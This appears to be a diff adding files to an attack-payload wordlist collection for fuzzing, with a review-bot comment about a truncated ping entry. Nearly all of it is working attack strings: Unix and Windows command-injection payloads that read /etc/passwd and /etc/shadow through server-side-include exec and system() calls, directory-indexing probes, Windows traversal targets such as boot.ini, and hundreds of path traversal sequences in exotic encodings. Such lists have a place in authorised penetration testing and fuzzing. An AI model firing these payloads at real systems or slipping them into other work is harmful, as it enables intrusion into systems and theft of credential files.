attack/os-cmd-execution/Commands-WindowsPowershell.txt
Normal file
164
attack/os-cmd-execution/Commands-WindowsPowershell.txt
Normal file
|
@ -0,0 +1,164 @@
|
|||
get-acl
|
||||
set-acl
|
||||
get-alias
|
||||
import-alias
|
||||
new-alias
|
||||
set-alias
|
||||
get-authenticodesignature
|
||||
set-authenticodesignature
|
||||
set-location
|
||||
get-childitem
|
||||
get-command
|
||||
measure-command
|
||||
trace-command
|
||||
add-content
|
||||
get-content
|
||||
set-content
|
||||
clear-content
|
||||
convertto-html
|
||||
convertfrom-securestring
|
||||
convertto-securestring
|
||||
clear-host
|
||||
clear-item
|
||||
copy-item
|
||||
get-credential
|
||||
get-childitem
|
||||
get-date
|
||||
set-date
|
||||
remove-item
|
||||
do
|
||||
get-psdrive
|
||||
new-psdrive
|
||||
remove-psdrive
|
||||
get-eventlog
|
||||
get-executionpolicy
|
||||
set-executionpolicy
|
||||
export-alias
|
||||
export-clixml
|
||||
export-console
|
||||
export-csv
|
||||
invoke-expression
|
||||
exit
|
||||
foreach-object
|
||||
foreach
|
||||
for
|
||||
format-custom
|
||||
format-list
|
||||
format-table
|
||||
format-wide
|
||||
get-item
|
||||
get-childitem
|
||||
get-help
|
||||
add-history
|
||||
get-history
|
||||
invoke-history
|
||||
get-host
|
||||
clear-host
|
||||
read-host
|
||||
write-host
|
||||
if
|
||||
import-clixml
|
||||
import-csv
|
||||
get-item
|
||||
invoke-item
|
||||
new-item
|
||||
remove-item
|
||||
set-item
|
||||
clear-itemproperty
|
||||
copy-itemproperty
|
||||
get-itemproperty
|
||||
move-itemproperty
|
||||
new-itemproperty
|
||||
remove-itemproperty
|
||||
rename-itemproperty
|
||||
set-itemproperty
|
||||
stop-process
|
||||
get-location
|
||||
pop-location
|
||||
push-location
|
||||
set-location
|
||||
add-member
|
||||
get-member
|
||||
move-item
|
||||
compare-object
|
||||
group-object
|
||||
measure-object
|
||||
new-object
|
||||
select-object
|
||||
sort-object
|
||||
where-object
|
||||
out-default
|
||||
out-file
|
||||
out-host
|
||||
out-null
|
||||
out-printer
|
||||
out-string
|
||||
powershell
|
||||
convert-path
|
||||
join-path
|
||||
resolve-path
|
||||
split-path
|
||||
test-path
|
||||
get-pfxcertificate
|
||||
pop-location
|
||||
push-location
|
||||
get-process
|
||||
stop-process
|
||||
clear-itemproperty
|
||||
copy-itemproperty
|
||||
get-itemproperty
|
||||
move-itemproperty
|
||||
new-itemproperty
|
||||
remove-itemproperty
|
||||
rename-itemproperty
|
||||
set-itemproperty
|
||||
get-psprovider
|
||||
set-psdebug
|
||||
add-pssnapin
|
||||
get-pssnapin
|
||||
remove-pssnapin
|
||||
quest
|
||||
read-host
|
||||
remove-item
|
||||
rename-item
|
||||
rename-itemproperty
|
||||
run/call
|
||||
select-object
|
||||
get-service
|
||||
new-service
|
||||
restart-service
|
||||
resume-service
|
||||
set-service
|
||||
sort-object
|
||||
start-service
|
||||
stop-service
|
||||
suspend-service
|
||||
start-sleep
|
||||
switch
|
||||
select-string
|
||||
tee-object
|
||||
new-timespan
|
||||
trace-command
|
||||
get-tracesource
|
||||
set-tracesource
|
||||
start-transcript
|
||||
stop-transcript
|
||||
get-uiculture
|
||||
get-unique
|
||||
update-formatdata
|
||||
update-typedata
|
||||
clear-variable
|
||||
get-variable
|
||||
new-variable
|
||||
remove-variable
|
||||
set-variable
|
||||
where-object
|
||||
where
|
||||
while
|
||||
get-wmiobject
|
||||
write-debug
|
||||
write-error
|
||||
write-output
|
||||
write-progress
|
||||
write-verbose
|
||||
write-warning
|
20
attack/os-cmd-execution/OSCommandInject.Windows.txt
Normal file
20
attack/os-cmd-execution/OSCommandInject.Windows.txt
Normal file
|
@ -0,0 +1,20 @@
|
|||
+|+Dir+c:\
|
||||
$+|+Dir+c:\
|
||||
%26%26+|+dir c:\
|
||||
$%26%26dir c:\
|
||||
%0a+dir+c:\
|
||||
+|+Dir+c:%255c
|
||||
$+|+Dir+c:%255c
|
||||
%26%26+|+dir c:%255c
|
||||
$%26%26dir+c:%255c
|
||||
%0a+dir+c:%255c
|
||||
+|+Dir+c:%2f
|
||||
$+|+Dir+c:%2f
|
||||
%26%26+|+dir c:%2f
|
||||
$%26%26dir+c:%2f
|
||||
%0a+dir+c:%2f
|
||||
+dir+c:\+|
|
||||
+|+dir+c:\+|
|
||||
+|+dir+c:%2f+|
|
||||
dir+c:\
|
||||
||+dir|c:\
|
70
attack/os-cmd-execution/command-execution-unix.txt
Normal file
70
attack/os-cmd-execution/command-execution-unix.txt
Normal file
|
@ -0,0 +1,70 @@
|
|||
<!--#exec%20cmd="/bin/cat%20/etc/passwd"-->
|
||||
<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->
|
||||
<!--#exec%20cmd="/usr/bin/id;-->
|
||||
<!--#exec%20cmd="/usr/bin/id;-->
|
||||
/index.html|id|
|
||||
;id;
|
||||
;id
|
||||
;netstat -a;
|
||||
;id;
|
||||
|id
|
||||
|/usr/bin/id
|
||||
|id|
|
||||
|/usr/bin/id|
|
||||
||/usr/bin/id|
|
||||
|id;
|
||||
||/usr/bin/id;
|
||||
;id|
|
||||
;|/usr/bin/id|
|
||||
\n/bin/ls -al\n
|
||||
\n/usr/bin/id\n
|
||||
\nid\n
|
||||
\n/usr/bin/id;
|
||||
\nid;
|
||||
\n/usr/bin/id|
|
||||
\nid|
|
||||
;/usr/bin/id\n
|
||||
;id\n
|
||||
|usr/bin/id\n
|
||||
|nid\n
|
||||
`id`
|
||||
`/usr/bin/id`
|
||||
a);id
|
||||
a;id
|
||||
a);id;
|
||||
a;id;
|
||||
a);id|
|
||||
a;id|
|
||||
a)|id
|
||||
a|id
|
||||
a)|id;
|
||||
a|id
|
||||
|/bin/ls -al
|
||||
a);/usr/bin/id
|
||||
a;/usr/bin/id
|
||||
a);/usr/bin/id;
|
||||
a;/usr/bin/id;
|
||||
a);/usr/bin/id|
|
||||
a;/usr/bin/id|
|
||||
a)|/usr/bin/id
|
||||
a|/usr/bin/id
|
||||
a)|/usr/bin/id;
|
||||
a|/usr/bin/id
|
||||
;system('cat%20/etc/passwd')
|
||||
;system('id')
|
||||
;system('/usr/bin/id')
|
||||
%0Acat%20/etc/passwd
|
||||
%0A/usr/bin/id
|
||||
%0Aid
|
||||
%0A/usr/bin/id%0A
|
||||
%0Aid%0A
|
||||
& ping -i 30 127.0.0.1 &
|
||||
& ping -n 30 127.0.0.1 &
|
||||
%0a ping -i 30 127.0.0.1 %0a
|
||||
`ping 127.0.0.1`
|
||||
| id
|
||||
& id
|
||||
; id
|
||||
%0a id %0a
|
||||
`id`
|
||||
$;/usr/bin/id
|
|
@ -0,0 +1,6 @@
|
|||
..%255c
|
||||
.%5c../..%5c
|
||||
/..%c0%9v../
|
||||
/..%c0%af../
|
||||
/..%255c..%255c
|
||||
|
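--- a/attack/os-cmd-execution/useful-commands-unix.txt
+++ b/attack/os-cmd-execution/useful-commands-unix.txt
@@ -0,0 +1,10 @@
+uname -n -s
+whoami
+pwd
+last
+cat /etc/passwd
+ls -la /tmp
+ls -la /home
+ping -i 30 127.0.0.1
+ping 127.0.0.1
+ping -n 30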
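Review bot: The last entry, `ping -n 30`, names no loopback target, unlike the two ping lines above it (`ping -i 30 127.0.0.1`, `ping 127.0.0.1`). `-n 30` is the count form of the Windows ping; on Linux iputils `-n` is, as far as I can tell, the numeric-output flag, so `30` would be read as the destination rather than a count. The line looks truncated or misfiled, so confirm which, then either complete it to match the loopback entries or move it to `useful-commands-windows.txt`. Separately, `ping 127.0.0.1` with no count does not terminate on Linux and can leave a stray process on the host under test; a bounded count would avoid that.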
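--- a/attack/os-cmd-execution/useful-commands-windows.txt
+++ b/attack/os-cmd-execution/useful-commands-windows.txt
@@ -0,0 +1,3 @@
+ver
+chdir
+echo %USERNAME%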
7
attack/os-dir-indexing/directory-indexing.txt
Normal file
|
@ -0,0 +1,7 @@
|
|||
;dir
|
||||
`dir`
|
||||
|dir|
|
||||
|dir
|
||||
/%3f.jsp
|
||||
?M=D
|
||||
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
|
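--- a/attack/path-traversal/path-traversal-windows.txt
+++ b/attack/path-traversal/path-traversal-windows.txt
@@ -0,0 +1,6 @@
+C:/inetpub/wwwroot/global.asa
+C:\inetpub\wwwroot\global.asa
+C:/boot.ini
+C:\boot.ini
+D:\inetpub\wwwroot\global.asa
+D:/inetpub/wwwroot/global.asa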
887
attack/path-traversal/traversals-8-deep-exotic-encoding.txt
Normal file
|
@ -0,0 +1,887 @@
|
|||
/../{FILE}
|
||||
/../../{FILE}
|
||||
/../../../{FILE}
|
||||
/../../../../{FILE}
|
||||
/../../../../../{FILE}
|
||||
/../../../../../../{FILE}
|
||||
/../../../../../../../{FILE}
|
||||
/../../../../../../../../{FILE}
|
||||
/..%2f{FILE}
|
||||
/..%2f..%2f{FILE}
|
||||
/..%2f..%2f..%2f{FILE}
|
||||
/..%2f..%2f..%2f..%2f{FILE}
|
||||
/..%2f..%2f..%2f..%2f..%2f{FILE}
|
||||
/..%2f..%2f..%2f..%2f..%2f..%2f{FILE}
|
||||
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}
|
||||
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}
|
||||
/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
|
||||
/%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
|
||||
/..%252f{FILE}
|
||||
/..%252f..%252f{FILE}
|
||||
/..%252f..%252f..%252f{FILE}
|
||||
/..%252f..%252f..%252f..%252f{FILE}
|
||||
/..%252f..%252f..%252f..%252f..%252f{FILE}
|
||||
/..%252f..%252f..%252f..%252f..%252f..%252f{FILE}
|
||||
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}
|
||||
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}
|
||||
/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
|
||||
/%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
|
||||
/..\{FILE}
|
||||
/..\..\{FILE}
|
||||
/..\..\..\{FILE}
|
||||
/..\..\..\..\{FILE}
|
||||
/..\..\..\..\..\{FILE}
|
||||
/..\..\..\..\..\..\{FILE}
|
||||
/..\..\..\..\..\..\..\{FILE}
|
||||
/..\..\..\..\..\..\..\..\{FILE}
|
||||
/..%255c{FILE}
|
||||
/..%255c..%255c{FILE}
|
||||
/..%255c..%255c..%255c{FILE}
|
||||
/..%255c..%255c..%255c..%255c{FILE}
|
||||
/..%255c..%255c..%255c..%255c..%255c{FILE}
|
||||
/..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
|
||||
/..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
|
||||
/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
|
||||
/..%5c..%5c{FILE}
|
||||
/..%5c..%5c..%5c{FILE}
|
||||
/..%5c..%5c..%5c..%5c{FILE}
|
||||
/..%5c..%5c..%5c..%5c..%5c{FILE}
|
||||
/..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
|
||||
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
|
||||
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
|
||||
/%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
|
||||
/%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
|
||||
/%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
|
||||
/%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
|
||||
/..%c0%af{FILE}
|
||||
/..%c0%af..%c0%af{FILE}
|
||||
/..%c0%af..%c0%af..%c0%af{FILE}
|
||||
/..%c0%af..%c0%af..%c0%af..%c0%af{FILE}
|
||||
/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}
|
||||
/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}
|
||||
/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}
|
||||
/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}
|
||||
/%c0%ae%c0%ae/{FILE}
|
||||
/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}
|
||||
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}
|
||||
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}
|
||||
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}
|
||||
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}
|
||||
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}
|
||||
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}
|
||||
/%c0%ae%c0%ae%c0%af{FILE}
|
||||
/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}
|
||||
/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}
|
||||
/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}
|
||||
/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}
|
||||
/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}
|
||||
/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}
|
||||
/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}
|
||||
/..%25c0%25af{FILE}
|
||||
/..%25c0%25af..%25c0%25af{FILE}
|
||||
/..%25c0%25af..%25c0%25af..%25c0%25af{FILE}
|
||||
/..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}
|
||||
/..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}
|
||||
/..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}
|
||||
/..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}
|
||||
/..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}
|
||||
/%25c0%25ae%25c0%25ae/{FILE}
|
||||
/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}
|
||||
/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}
|
||||
/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}
|
||||
/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}
|
||||
/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}
|
||||
/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}
|
||||
/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}
|
||||
/%25c0%25ae%25c0%25ae%25c0%25af{FILE}
|
||||
/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}
|
||||
/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}
|
||||
/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}
|
||||
/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}
|
||||
/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}
|
||||
/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}
|
||||
/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}
|
||||
/..%c1%9c{FILE}
|
||||
/..%c1%9c..%c1%9c{FILE}
|
||||
/..%c1%9c..%c1%9c..%c1%9c{FILE}
|
||||
/..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}
|
||||
/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}
|
||||
/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}
|
||||
/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}
|
||||
/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}
|
||||
/%c0%ae%c0%ae\{FILE}
|
||||
/%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}
|
||||
/%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}
|
||||
/%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}
|
||||
/%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}
|
||||
/%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}
|
||||
/%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}
|
||||
/%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}
|
||||
/%c0%ae%c0%ae%c1%9c{FILE}
|
||||
/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}
|
||||
/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}
|
||||
/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}
|
||||
/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}
|
||||
/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}
|
||||
/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}
|
||||
/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}
|
||||
/..%25c1%259c{FILE}
|
||||
/..%25c1%259c..%25c1%259c{FILE}
|
||||
/..%25c1%259c..%25c1%259c..%25c1%259c{FILE}
|
||||
/..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}
|
||||
/..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}
|
||||
/..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}
|
||||
/..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}
|
||||
/..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}
|
||||
/%25c0%25ae%25c0%25ae\{FILE}
|
||||
/%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}
|
||||
/%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}
|
||||
/%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}
|
||||
/%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}
|
||||
/%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}
|
||||
/%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}
|
||||
/%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}
|
||||
